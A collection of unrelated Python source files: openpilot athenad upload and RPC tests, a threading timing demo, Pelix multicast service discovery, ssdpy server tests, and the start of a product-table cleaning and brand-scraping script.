self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, expected)
prefix = f'{route}--1/'
expected = filter(lambda f: f.startswith(prefix), files)
resp = dispatcher["listDataDirectory"](prefix)
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, expected)
prefix = f'{route}--1/q'
expected = filter(lambda f: f.startswith(prefix), files)
resp = dispatcher["listDataDirectory"](prefix)
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, expected)
def test_strip_bz2_extension(self):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
if fn.endswith('.bz2'):
self.assertEqual(athenad.strip_bz2_extension(fn), fn[:-4])
@with_http_server
def test_do_upload(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url="http://localhost:1238", headers={}, created_at=int(time.time()*1000), id='')
with self.assertRaises(requests.exceptions.ConnectionError):
athenad._do_upload(item)
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
resp = athenad._do_upload(item)
self.assertEqual(resp.status_code, 201)
@with_http_server
def test_uploadFileToUrl(self, host):
not_exists_resp = dispatcher["uploadFileToUrl"]("does_not_exist.bz2", "http://localhost:1238", {})
self.assertEqual(not_exists_resp, {'enqueued': 0, 'items': [], 'failed': ['does_not_exist.bz2']})
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
resp = dispatcher["uploadFileToUrl"]("qlog.bz2", f"{host}/qlog.bz2", {})
self.assertEqual(resp['enqueued'], 1)
self.assertNotIn('failed', resp)
self.assertDictContainsSubset({"path": fn, "url": f"{host}/qlog.bz2", "headers": {}}, resp['items'][0])
self.assertIsNotNone(resp['items'][0].get('id'))
self.assertEqual(athenad.upload_queue.qsize(), 1)
@with_http_server
def test_upload_handler(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='', allow_cellular=True)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
athenad.upload_queue.put_nowait(item)
try:
self.wait_for_upload()
time.sleep(0.1)
# TODO: verify that upload actually succeeded
self.assertEqual(athenad.upload_queue.qsize(), 0)
finally:
end_event.set()
@with_http_server
@mock.patch('requests.put')
def test_upload_handler_retry(self, host, mock_put):
for status, retry in ((500, True), (412, False)):
mock_put.return_value.status_code = status
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='', allow_cellular=True)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
athenad.upload_queue.put_nowait(item)
try:
self.wait_for_upload()
time.sleep(0.1)
self.assertEqual(athenad.upload_queue.qsize(), 1 if retry else 0)
finally:
end_event.set()
if retry:
self.assertEqual(athenad.upload_queue.get().retry_count, 1)
def test_upload_handler_timeout(self):
"""When an upload times out or fails to connect it should be placed back in the queue"""
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='', allow_cellular=True)
item_no_retry = item._replace(retry_count=MAX_RETRY_COUNT)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
athenad.upload_queue.put_nowait(item_no_retry)
self.wait_for_upload()
time.sleep(0.1)
# Check that upload with retry count exceeded is not put back
self.assertEqual(athenad.upload_queue.qsize(), 0)
athenad.upload_queue.put_nowait(item)
self.wait_for_upload()
time.sleep(0.1)
# Check that upload item was put back in the queue with incremented retry count
self.assertEqual(athenad.upload_queue.qsize(), 1)
self.assertEqual(athenad.upload_queue.get().retry_count, 1)
finally:
end_event.set()
def test_cancelUpload(self):
item = athenad.UploadItem(path="qlog.bz2", url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='id', allow_cellular=True)
athenad.upload_queue.put_nowait(item)
dispatcher["cancelUpload"](item.id)
self.assertIn(item.id, athenad.cancelled_uploads)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
self.wait_for_upload()
time.sleep(0.1)
self.assertEqual(athenad.upload_queue.qsize(), 0)
self.assertEqual(len(athenad.cancelled_uploads), 0)
finally:
end_event.set()
def test_cancelExpiry(self):
t_future = datetime.now() - timedelta(days=40)
ts = int(t_future.strftime("%s")) * 1000
# Item that would time out if actually uploaded
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url="http://localhost:44444/qlog.bz2", headers={}, created_at=ts, id='', allow_cellular=True)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
athenad.upload_queue.put_nowait(item)
self.wait_for_upload()
time.sleep(0.1)
self.assertEqual(athenad.upload_queue.qsize(), 0)
finally:
end_event.set()
def test_listUploadQueueEmpty(self):
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 0)
@with_http_server
def test_listUploadQueueCurrent(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='', allow_cellular=True)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
athenad.upload_queue.put_nowait(item)
self.wait_for_upload()
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 1)
self.assertTrue(items[0]['current'])
finally:
end_event.set()
def test_listUploadQueue(self):
item = athenad.UploadItem(path="qlog.bz2", url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='id', allow_cellular=True)
athenad.upload_queue.put_nowait(item)
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 1)
self.assertDictEqual(items[0], item._asdict())
self.assertFalse(items[0]['current'])
athenad.cancelled_uploads.add(item.id)
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 0)
def test_upload_queue_persistence(self):
item1 = athenad.UploadItem(path="_", url="_", headers={}, created_at=int(time.time()), id='id1')
item2 = athenad.UploadItem(path="_", url="_", headers={}, created_at=int(time.time()), id='id2')
athenad.upload_queue.put_nowait(item1)
athenad.upload_queue.put_nowait(item2)
# Ensure cancelled items are not persisted
athenad.cancelled_uploads.add(item2.id)
# serialize item
athenad.UploadQueueCache.cache(athenad.upload_queue)
# deserialize item
athenad.upload_queue.queue.clear()
athenad.UploadQueueCache.initialize(athenad.upload_queue)
self.assertEqual(athenad.upload_queue.qsize(), 1)
self.assertDictEqual(athenad.upload_queue.queue[-1]._asdict(), item1._asdict())
@mock.patch('selfdrive.athena.athenad.create_connection')
def test_startLocalProxy(self, mock_create_connection):
end_event = threading.Event()
ws_recv = queue.Queue()
ws_send = queue.Queue()
mock_ws = MockWebsocket(ws_recv, ws_send)
mock_create_connection.return_value = mock_ws
echo_socket = EchoSocket(self.SOCKET_PORT)
socket_thread = threading.Thread(target=echo_socket.run)
socket_thread.start()
athenad.startLocalProxy(end_event, 'ws://localhost:1234', self.SOCKET_PORT)
ws_recv.put_nowait(b'ping')
try:
recv = ws_send.get(timeout=5)
assert recv == (b'ping', ABNF.OPCODE_BINARY), recv
finally:
# signal websocket close to athenad.ws_proxy_recv
ws_recv.put_nowait(WebSocketConnectionClosedException())
socket_thread.join()
def test_getSshAuthorizedKeys(self):
keys = dispatcher["getSshAuthorizedKeys"]()
self.assertEqual(keys, MockParams().params["GithubSshKeys"].decode('utf-8'))
def test_getVersion(self):
resp = dispatcher["getVersion"]()
keys = ["version", "remote", "branch", "commit"]
self.assertEqual(list(resp.keys()), keys)
for k in keys:
self.assertIsInstance(resp[k], str, f"{k} is not a string")
self.assertTrue(len(resp[k]) > 0, f"{k} has no value")
def test_jsonrpc_handler(self):
end_event = threading.Event()
thread = threading.Thread(target=athenad.jsonrpc_handler, args=(end_event,))
thread.daemon = True
thread.start()
try:
# with params
athenad.recv_queue.put_nowait(json.dumps({"method": "echo", "params": ["hello"], "jsonrpc": "2.0", "id": 0}))
resp = athenad.send_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': 'hello', 'id': 0, 'jsonrpc': '2.0'})
# without params
athenad.recv_queue.put_nowait(json.dumps({"method": "getNetworkType", "jsonrpc": "2.0", "id": 0}))
resp = athenad.send_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': 1, 'id': 0, 'jsonrpc': '2.0'})
# log forwarding
athenad.recv_queue.put_nowait(json.dumps({'result': {'success': 1}, 'id': 0, 'jsonrpc': '2.0'}))
resp = athenad.log_recv_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': {'success': 1}, 'id': 0, 'jsonrpc': '2.0'})
finally:
end_event.set()
thread.join()
def test_get_logs_to_send_sorted(self):
fl = list()
for i in range(10):
fn = os.path.join(swaglog.SWAGLOG_DIR, f'swaglog.{i:010}')
Path(fn).touch()
fl.append(os.path.basename(fn))
# ensure the list is all logs except most recent
sl = athenad.get_logs_to_send_sorted()
self.assertListEqual(sl, fl[:-1])
if __name__ == '__main__':
unittest.main()
|
addTwoTimes.py
|
import threading
import time
def add(r):
res = 0
for i in r:
res += i
tid = threading.current_thread().name
print("Result in {} = {}".format(tid, res))
#################################################
# Sequential Processing:
#################################################
t = time.time()
result = 0
add(range(50_000_00))
add(range(50_000_00))
print("Sequential Processing result: ", result)
print("Sequential Processing took:",time.time() - t,"\n")
#################################################
# Multithreaded Processing:
#################################################
t = time.time()
result = 0
#create threads
tr1 = threading.Thread(name="tr1", target=add, args=(range(50_000_00),))
tr2 = threading.Thread(name="tr2", target=add, args=(range(50_000_00),))
# start threads
tr1.start(); tr2.start()
# wait threads to finish their job
tr1.join(); tr2.join()
print("Multithreaded Processing result: ", result)
print("Multithreaded Processing took:",time.time() - t,"\n")
|
multicast.py
|
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
Pelix remote services: Multicast discovery and event notification
A discovery packet contains the access to the dispatcher servlet, which
can be used to get the end points descriptions.
An event notification packet contain an end point UID, a kind of event and the
previous service properties (if the event is an update).
**WARNING:** Do not forget to open the UDP ports used for the multicast, even
when using remote services on the local host only.
:author: Thomas Calmant
:copyright: Copyright 2020, Thomas Calmant
:license: Apache License 2.0
:version: 1.0.1
..
Copyright 2020 Thomas Calmant
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Standard library
import logging
import json
import os
import select
import socket
import struct
import threading
# iPOPO decorators
from pelix.ipopo.decorators import (
ComponentFactory,
Requires,
Provides,
Invalidate,
Validate,
Property,
)
# Pelix utilities
import pelix.constants
from pelix.ipv6utils import ipproto_ipv6
from pelix.utilities import to_bytes, to_str
# Remote services
import pelix.remote
# ------------------------------------------------------------------------------
# Module version
__version_info__ = (1, 0, 1)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# ------------------------------------------------------------------------------
_logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
if os.name == "nt":
# Windows Specific code
def pton(family, address):
"""
Calls inet_pton
:param family: Socket family
:param address: A string address
:return: The binary form of the given address
"""
if family == socket.AF_INET:
return socket.inet_aton(address)
elif family == socket.AF_INET6:
# Do it using WinSocks
import ctypes
winsock = ctypes.windll.ws2_32
# Prepare structure
class sockaddr_in6(ctypes.Structure):
# pylint: disable=C0103, R0903
"""
Definition of the C structure 'sockaddr_in6'
"""
_fields_ = [
("sin6_family", ctypes.c_short),
("sin6_port", ctypes.c_ushort),
("sin6_flowinfo", ctypes.c_ulong),
("sin6_addr", ctypes.c_ubyte * 16),
("sin6_scope_id", ctypes.c_ulong),
]
# Prepare pointers
addr_ptr = ctypes.c_char_p(to_bytes(address))
out_address = sockaddr_in6()
size = len(sockaddr_in6)
size_ptr = ctypes.pointer(size)
# Second call
winsock.WSAStringToAddressA(
addr_ptr, family, 0, out_address, size_ptr
)
# Convert the array...
bin_addr = 0
for part in out_address.sin6_addr:
bin_addr = bin_addr * 16 + part
return bin_addr
else:
raise ValueError("Unhandled socket family: {0}".format(family))
else:
# Other systems
def pton(family, address):
"""
Calls inet_pton
:param family: Socket family
:param address: A string address
:return: The binary form of the given address
"""
return socket.inet_pton(family, address)
# ------------------------------------------------------------------------------
def make_mreq(family, address):
"""
Makes a mreq structure object for the given address and socket family.
:param family: A socket family (AF_INET or AF_INET6)
:param address: A multicast address (group)
:raise ValueError: Invalid family or address
"""
if not address:
raise ValueError("Empty address")
# Convert the address to a binary form
group_bin = pton(family, address)
if family == socket.AF_INET:
# IPv4
# struct ip_mreq
# {
# struct in_addr imr_multiaddr; /* IP multicast address of group */
# struct in_addr imr_interface; /* local IP address of interface */
# };
# "=I" : Native order, standard size unsigned int
return group_bin + struct.pack("=I", socket.INADDR_ANY)
elif family == socket.AF_INET6:
# IPv6
# struct ipv6_mreq {
# struct in6_addr ipv6mr_multiaddr;
# unsigned int ipv6mr_interface;
# };
# "@I" : Native order, native size unsigned int
return group_bin + struct.pack("@I", 0)
raise ValueError("Unknown family {0}".format(family))
# ------------------------------------------------------------------------------
def create_multicast_socket(address, port):
"""
Creates a multicast socket according to the given address and port.
Handles both IPv4 and IPv6 addresses.
:param address: Multicast address/group
:param port: Socket port
:return: A tuple (socket, listening address)
:raise ValueError: Invalid address or port
"""
# Get the information about a datagram (UDP) socket, of any family
try:
addrs_info = socket.getaddrinfo(
address, port, socket.AF_UNSPEC, socket.SOCK_DGRAM
)
except socket.gaierror:
raise ValueError(
"Error retrieving address informations ({0}, {1})".format(
address, port
)
)
if len(addrs_info) > 1:
_logger.debug(
"More than one address information found. Using the first one."
)
# Get the first entry : (family, socktype, proto, canonname, sockaddr)
addr_info = addrs_info[0]
# Only accept IPv4/v6 addresses
if addr_info[0] not in (socket.AF_INET, socket.AF_INET6):
# Unhandled address family
raise ValueError("Unhandled socket family : %d" % (addr_info[0]))
# Prepare the socket
sock = socket.socket(addr_info[0], socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Reuse address
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if hasattr(socket, "SO_REUSEPORT"):
# Special for MacOS
# pylint: disable=E1101
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
# Bind the socket
if sock.family == socket.AF_INET:
# IPv4 binding
sock.bind(("0.0.0.0", port))
else:
# IPv6 Binding
sock.bind(("::", port))
# Prepare the mreq structure to join the group
# addrinfo[4] = (addr,port)
mreq = make_mreq(sock.family, addr_info[4][0])
# Join the group
if sock.family == socket.AF_INET:
# IPv4
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
# Allow multicast packets to get back on this host
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_LOOP, 1)
elif sock.family == socket.AF_INET6:
# IPv6
sock.setsockopt(ipproto_ipv6(), socket.IPV6_JOIN_GROUP, mreq)
# Allow multicast packets to get back on this host
sock.setsockopt(ipproto_ipv6(), socket.IPV6_MULTICAST_LOOP, 1)
return sock, addr_info[4][0]
def close_multicast_socket(sock, address):
"""
Cleans up the given multicast socket.
Unregisters it of the multicast group.
Parameters should be the result of create_multicast_socket
:param sock: A multicast socket
:param address: The multicast address used by the socket
"""
if sock is None:
return
if address:
# Prepare the mreq structure to join the group
mreq = make_mreq(sock.family, address)
# Quit group
if sock.family == socket.AF_INET:
# IPv4
sock.setsockopt(socket.IPPROTO_IP, socket.IP_DROP_MEMBERSHIP, mreq)
elif sock.family == socket.AF_INET6:
# IPv6
sock.setsockopt(ipproto_ipv6(), socket.IPV6_LEAVE_GROUP, mreq)
# Close the socket
sock.close()
# ------------------------------------------------------------------------------
@ComponentFactory(pelix.remote.FACTORY_DISCOVERY_MULTICAST)
@Provides(pelix.remote.SERVICE_EXPORT_ENDPOINT_LISTENER)
@Requires("_access", pelix.remote.SERVICE_DISPATCHER_SERVLET)
@Requires("_registry", pelix.remote.SERVICE_REGISTRY)
@Property("_group", "multicast.group", "239.0.0.1")
@Property("_port", "multicast.port", 42000)
class MulticastDiscovery(object):
"""
Remote services discovery and notification using multicast packets
"""
def __init__(self):
"""
Sets up the component
"""
# End points registry
self._registry = None
# Dispatcher access
self._access = None
# Framework UID
self._fw_uid = None
# Socket
self._group = "239.0.0.1"
self._port = 42000
self._socket = None
self._target = None
# Reception loop
self._stop_event = threading.Event()
self._thread = None
def __make_basic_dict(self, event):
"""
Prepares basic common information contained into an event packet
(access, framework UID, event type)
:param event: The kind of event
:return: A dictionary
"""
# Get the dispatcher servlet access
access = self._access.get_access()
# Make the event packet content
return {
"sender": self._fw_uid,
"event": event, # Kind of event
"access": {
"port": access[0], # Access to the dispatcher
"path": access[1],
},
} # servlet
def _make_endpoint_dict(self, event, endpoint):
"""
Prepares an event packet containing a single endpoint
:param event: The kind of event (update, remove)
:param endpoint: An ExportEndpoint bean
:return: A dictionary
"""
# Basic packet information
packet = self.__make_basic_dict(event)
# Add endpoint information
packet["uid"] = endpoint.uid
if event == "update":
# Give the new end point properties
packet["new_properties"] = endpoint.make_import_properties()
return packet
def _make_endpoints_dict(self, event, endpoints):
"""
Prepares an event packet containing multiple endpoints
:param event: The kind of event (add)
:param endpoints: A list of ExportEndpoint beans
:return: A dictionary
"""
# Basic packet information
packet = self.__make_basic_dict(event)
# Add endpoints information
packet["uids"] = [endpoint.uid for endpoint in endpoints]
return packet
def __send_packet(self, data, target=None):
"""
Sends a UDP datagram to the given target, if given, or to the multicast
group.
:param data: The content of the datagram
:param target: The packet target (can be None)
"""
if target is None:
# Use the multicast target by default
target = self._target
# Converts data to bytes
data = to_bytes(data)
# Send the data
self._socket.sendto(data, 0, target)
def _send_discovery(self):
"""
Sends a discovery packet, requesting others to indicate their services
"""
# Send a JSON request
data = json.dumps(self.__make_basic_dict("discovery"))
self.__send_packet(data)
def endpoints_added(self, endpoints):
"""
Multiple endpoints have been created
"""
# Send a JSON event
data = json.dumps(self._make_endpoints_dict("add", endpoints))
self.__send_packet(data)
def endpoint_updated(self, endpoint, old_properties):
# pylint: disable=W0613
"""
An end point is updated
"""
# Send a JSON event
data = json.dumps(self._make_endpoint_dict("update", endpoint))
self.__send_packet(data)
def endpoint_removed(self, endpoint):
"""
An end point is removed
"""
# Send a JSON event
data = json.dumps(self._make_endpoint_dict("remove", endpoint))
self.__send_packet(data)
def _handle_packet(self, sender, raw_data):
"""
Calls the method associated to the kind of event indicated in the given
packet.
:param sender: The (address, port) tuple of the client
:param raw_data: Raw packet content
"""
# Decode content
data = json.loads(raw_data)
# Avoid handling our own packets
sender_uid = data["sender"]
if sender_uid == self._fw_uid:
return
# Dispatch the event
event = data["event"]
if event == "discovery":
# Discovery request
access = data["access"]
self._access.send_discovered(
sender[0], access["port"], access["path"]
)
elif event in ("add", "update", "remove"):
# End point event
self._handle_event_packet(sender, data)
else:
_logger.warning("Unknown event '%s' from %s", event, sender)
def _handle_event_packet(self, sender, data):
"""
Handles an end point event packet
:param sender: The (address, port) tuple of the client
:param data: Decoded packet content
"""
# Get the event
event = data["event"]
if event == "add":
# Store it
port = data["access"]["port"]
path = data["access"]["path"]
for uid in data["uids"]:
# Get the description of the endpoint
endpoint = self._access.grab_endpoint(
sender[0], port, path, uid
)
if endpoint is not None:
# Register the endpoint
self._registry.add(endpoint)
elif event == "remove":
# Remove it
self._registry.remove(data["uid"])
elif event == "update":
# Update it
endpoint_uid = data["uid"]
new_properties = data["new_properties"]
self._registry.update(endpoint_uid, new_properties)
def _read_loop(self):
"""
Reads packets from the socket
"""
while not self._stop_event.is_set():
# Watch for content
ready = select.select([self._socket], [], [], 1)
if ready[0]:
# Socket is ready
data, sender = self._socket.recvfrom(1024)
try:
data = to_str(data)
self._handle_packet(sender, data)
except Exception as ex:
_logger.exception("Error handling the packet: %s", ex)
@Invalidate
def invalidate(self, _):
"""
Component invalidated
"""
# Stop the loop
self._stop_event.set()
# Join the thread
self._thread.join()
# Close the socket
close_multicast_socket(self._socket, self._target[0])
# Clean up
self._thread = None
self._socket = None
self._target = None
self._fw_uid = None
_logger.debug("Multicast discovery invalidated")
@Validate
def validate(self, context):
"""
Component validated
"""
# Ensure we have a valid port
self._port = int(self._port)
# Get the framework UID
self._fw_uid = context.get_property(pelix.constants.FRAMEWORK_UID)
# Create the socket
self._socket, address = create_multicast_socket(self._group, self._port)
# Store group access information
self._target = (address, self._port)
# Start the listening thread
self._stop_event.clear()
self._thread = threading.Thread(target=self._read_loop)
self._thread.start()
# Send a discovery request
self._send_discovery()
_logger.debug(
"Multicast discovery validated: group=%s port=%d",
self._group,
self._port,
)
|
test_server.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import threading
import time
import pytest
import os
from ssdpy import SSDPServer
def test_server_ipv4():
server = SSDPServer("test-server", proto="ipv4")
server.sock.settimeout(5)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
time.sleep(0.5)
server.stopped = True
server_thread.join()
@pytest.mark.skipif(
os.environ.get("TRAVIS") == "true",
reason="IPv6 testing is broken in Travis-CI, see https://github.com/travis-ci/travis-ci/issues/8361",
)
def test_server_ipv6():
server = SSDPServer("test-server-ipv6", proto="ipv6")
server.sock.settimeout(5)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
time.sleep(0.5)
server.stopped = True
server_thread.join()
|
Entity_Product_Clean cluster tables & Allocation.py
|
### This python script is used to perform the keyword search in several steps, allocate the remaining rows to the specified domains & perform a post-processing task based on manually selected similarity scores. ###
import pandas as pd
import os
import progressbar
from urllib.request import urlopen, Request
from bs4 import BeautifulSoup
import json
import logging
import threading
import time
from nltk.corpus import stopwords
import string
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
from nltk.tokenize import word_tokenize
def thread_function(name):
logging.info("Thread %s: starting", name)
time.sleep(2)
logging.info("Thread %s: finishing", name)
"""
session = None
def set_global_session():
global session
if not session:
session = requests.Session()
def download_site(url):
with session.get(url) as response:
name = multiprocessing.current_process().name
print(f"{name}:Read {len(response.content)} from {url}")
def download_all_sites(sites):
with multiprocessing.Pool(initializer=set_global_session) as pool:
pool.map(download_site, sites)
"""
path_parent = os.path.dirname(os.getcwd())
product_path = os.path.join(path_parent, 'src/data/product')
cleaned_top100_path = os.path.join(product_path, 'product_top100/cleaned')
cleaned_min3_path = os.path.join(product_path, 'product_minimum3/cleaned')
cluster_path = os.path.join(product_path, 'lspc2020_to_tablecorpus/Cleaned')
notebook_path = os.path.join(path_parent, 'notebooks')
def clean_clusters():
"""
iterate through all cluster_files;
clean them by using only valid top100 and min3 files after language detection;
count how much tables include a certain product
:return:
"""
# list all valid files after language detection
data_files = [file for file in os.listdir(cleaned_min3_path) if file.endswith('.json.gz')]
data_files += [file for file in os.listdir(cleaned_top100_path) if file.endswith('.json.gz')]
cluster_files = [file for file in os.listdir(cluster_path) if file.endswith('.json.gz')]
# generate dictionaries with different information to track product allocation
allocation_with_table_ids_total_dict = {}
allocation_with_table_ids_set_dict = {}
allocation_amount_only_total_dict = {}
allocation_amount_only_set_dict = {}
unique_cluster_ids = []
count_files = 0
for cluster_file in cluster_files:
print(cluster_file)
df = pd.read_json(os.path.join(cluster_path, '{}'.format(cluster_file)), compression='gzip', lines=True)
# design new dataframe with valid tables only
df_cleaned = df[df['table_id'].isin(data_files)]
df_cleaned = df_cleaned.reset_index()
df_cleaned = df_cleaned.drop('index', axis=1)
# generate a unique list of cluster IDs
cluster_ids = df_cleaned['cluster_id'].tolist()
if unique_cluster_ids == []:
new_cluster_ids = list(set(cluster_ids))
else:
new_cluster_ids = list(set(cluster_ids) - set(unique_cluster_ids))
unique_cluster_ids += new_cluster_ids
unique_cluster_ids = list(set(unique_cluster_ids))
# add dictionary keys
new_cluster_ids_tables_dict = {key: [] for key in new_cluster_ids}
new_cluster_ids_amount_dict = {key: 0 for key in new_cluster_ids}
allocation_with_table_ids_total_dict.update(new_cluster_ids_tables_dict)
allocation_with_table_ids_set_dict.update(new_cluster_ids_tables_dict)
allocation_amount_only_total_dict.update(new_cluster_ids_amount_dict)
allocation_amount_only_set_dict.update(new_cluster_ids_amount_dict)
count = 0
with progressbar.ProgressBar(max_value=df_cleaned.shape[0]) as bar:
for i in range(df_cleaned.shape[0]): # iterate over rows
cluster_id = df_cleaned['cluster_id'][i]
table_id = df_cleaned['table_id'][i]
allocation_with_table_ids_total_dict[cluster_id].append(table_id) # write every table_id inside
allocation_amount_only_total_dict[cluster_id] += 1 # increment for every table_id
allocation_with_table_ids_set_dict[cluster_id] = list(
set(allocation_with_table_ids_total_dict[cluster_id])) # write only unique table_ids inside
allocation_amount_only_set_dict[cluster_id] = len(
allocation_with_table_ids_set_dict[cluster_id]) # increment only for unique table_ids
count += 1
bar.update(count)
count_files += 1
print('{} out of {} cluster files done'.format(count_files, len(cluster_files)))
# write to gzip compressed json file
df_cleaned.to_json(os.path.join(cluster_path, '{}'.format(cluster_file)), compression='gzip', orient='records',
lines=True)
# save dictionaries with allocation of products
with open(os.path.join(cluster_path, 'allocation_with_table_ids_total_dict.json'), 'w', encoding='utf-8') as f:
json.dump(allocation_with_table_ids_total_dict, f)
with open(os.path.join(cluster_path, 'allocation_with_table_ids_set_dict.json'), 'w', encoding='utf-8') as f:
json.dump(allocation_with_table_ids_set_dict, f)
with open(os.path.join(cluster_path, 'allocation_amount_only_total_dict.json'), 'w', encoding='utf-8') as f:
json.dump(allocation_amount_only_total_dict, f)
with open(os.path.join(cluster_path, 'allocation_amount_only_set_dict.json'), 'w', encoding='utf-8') as f:
json.dump(allocation_amount_only_set_dict, f)
def get_keywords():
"""
finds all important brands for clothes and electronics
:return: dictionary {'clothes' : [clothes_brand1, clothes_brand2, ...],
'electronics' : [electronics_brand1, electronics_brand2, ...]}
"""
print('get keywords')
# search for clothes brands top100
clothes_html = urlopen('https://fashionunited.com/i/most-valuable-fashion-brands/')
clothes_bsObj = BeautifulSoup(clothes_html.read(), 'lxml')
clothes_table = clothes_bsObj.find('table')
clothes_lines = clothes_table.find('tbody').find_all('tr')
clothes_list = []
for clothes_line in clothes_lines:
clothes_brand = clothes_line.get_text().split('\n')[2].lower()
clothes_list.append(clothes_brand)
# search for top electronic brands
req = Request('https://companiesmarketcap.com/electronics/largest-electronic-manufacturing-by-market-cap/',
headers={'User-Agent': 'Mozilla/5.0'})
electronics_html = urlopen(req)
electronics_bsObj = BeautifulSoup(electronics_html.read(), 'lxml')
electronics_lines = electronics_bsObj.find_all('tr')
electronics_list = []
for electronics_line in electronics_lines:
electronics_brand_info = electronics_line.find('a')
if electronics_brand_info != None:
electronics_brand = electronics_brand_info.find('div').get_text().split('\r')[0].lower()
electronics_list.append(electronics_brand)
# second page
electronics_list2 = ['intel', 'taiwan semiconductor manufacturing', 'samsung electronics',
'hon hai precision industry',
'hitachi', 'sony', 'panasonic', 'lg electronics', 'pegatron', 'mitsubishi electric',
'midea group',
'honeywell international', 'apple', 'dell technologies', 'hp', 'lenovo', 'quanta computer',
'canon',
'compal eLectronics', 'hewlett packard enterprise']
# only top 10
clothes_top10 = []
brands_dict = {'clothes': clothes_list, 'electronics1': electronics_list, 'electronics2': electronics_list2,
'electronics_total': list(set(electronics_list + electronics_list2))}
with open(os.path.join(product_path, 'brands_dict.json'), 'w', encoding='utf-8') as f:
json.dump(brands_dict, f)
print('getting keywords done')
return brands_dict
def get_new_keywords():
print('get keywords')
with open(os.path.join(product_path, 'brands_dict.json'), 'r', encoding='utf-8') as f:
brands_dict = json.load(f)
"""
# for bikes
bikes_html = urlopen('https://bikesreviewed.com/brands/')
bikes_bsObj = BeautifulSoup(bikes_html.read(), 'lxml')
bikes_lines = bikes_bsObj.find_all('h3')
bikes_list = []
for bikes_line in bikes_lines:
if len(bikes_line.get_text().split('. ')) > 1:
bikes_brand = bikes_line.get_text().split('. ')[1].lower()
else:
bikes_brand = bikes_line.get_text().lower()
bikes_list.append(bikes_brand)
bikes_list.append('nonch')
bikes2_html = urlopen('https://www.globalbrandsmagazine.com/top-bicycle-brands-in-the-world-2020/')
bikes2_bsObj = BeautifulSoup(bikes2_html.read(), 'lxml')
bikes2_lines = bikes2_bsObj.find_all('h3')
for bikes2_line in bikes2_lines:
bikes2_brand = bikes2_line.find('a').get_text().lower()
bikes_list.append(bikes2_brand)
bikes_list = [element.split('\u00a0')[1] if element.startswith('\u00a0') else element for element in bikes_list]
bikes_list = [element for element in bikes_list if element not in [
' 8 thoughts on “the best bike brands for 2021 – the top 60 road, mountain, hybrid and bmx bike manufacturers ranked”',
'lifestyle', '11. huffy bikes', 'leave a reply cancel reply', 'all-around brands', 'hybrid', 'road ']]
bikes_list.append('huffy bikes')
# removed giant, electric, folding manually
bikes_list = list(set(bikes_list))
brands_dict['bikes'] = bikes_list
# for drugstore
brands_dict['drugstore'] = ['avène', 'dove', 'jergens', 'mele', 'vichy', 'e.l.f.', 'bevel', 'eucerin', 'acnefree',
'maybelline', 'la roche-posay', 'odele', 'neutrogena', 'flamingo', 'inm', 'shea moisture',
'sheamoisture', 'olay', 'cerave', 'nyx', "pond’s", "pond's", 'ponds', 'pacifica',
